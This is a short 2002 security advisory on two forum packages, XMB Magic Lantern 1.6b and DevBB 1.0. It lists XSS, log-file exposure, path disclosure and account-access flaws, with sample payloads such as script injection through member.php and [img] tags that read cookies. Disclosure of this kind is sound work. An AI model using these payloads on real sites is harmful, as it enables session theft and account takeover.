Security holes : XMB Magic Lantern forum & DevBB

2002-05-13T00:00:00
ID SECURITYVULNS:DOC:2930
Type securityvulns
Reporter Securityvulns
Modified 2002-05-13T00:00:00

Description

Hi all :)

Product 1 :


XMB Magic Lantern forum 1.6b final

http://www.xmbforum.com

http://www.aventure-media.co.uk

Problems :

  • Reading of logs files

  • XSS

  • Path Disclosure

  • Access to users/admins accounts

  • Logs distortion

Exploits :

  • /index_log.log

  • /cplogfile.log

  • If index_log not chmod 777 => index_add.php

  • index.php?analized=huhu

  • member.php?action=viewpro&member=<fo*rm%20name=o><input%

20name=u%20value=XSS></form><script>alert

(document.o.u.value)</script> (without '' )

  • [img]javascript:alert('hop'+document.cookie)[/img]

  • [img]" onerror="alert('hum')" width="0[/img]

  • member.php?action=reg&username=%253Cscript%253E&...

  • ...

Product 2 :


DevBB 1.0 final

http://www.mybboard.com

Problems :

  • DB emptying

  • XSS

  • Reading of logs files

  • Access to users/admins accounts

Exploits :

  • /admin/cplogfile.log

  • /install.php

  • ...

More details :

in french :

http://www.ifrance.com/kitetoua/tuto/xmbml-devbb.txt

translated by google :

http://translate.google.com/translate?

u=http://www.ifrance.com/kitetoua/tuto/xmbml-

devbb.txt&langpair=fr|en&hl=fr&ie=ASCII&oe=ASCII

As usual, sorry for my bad english :)

frog-m@n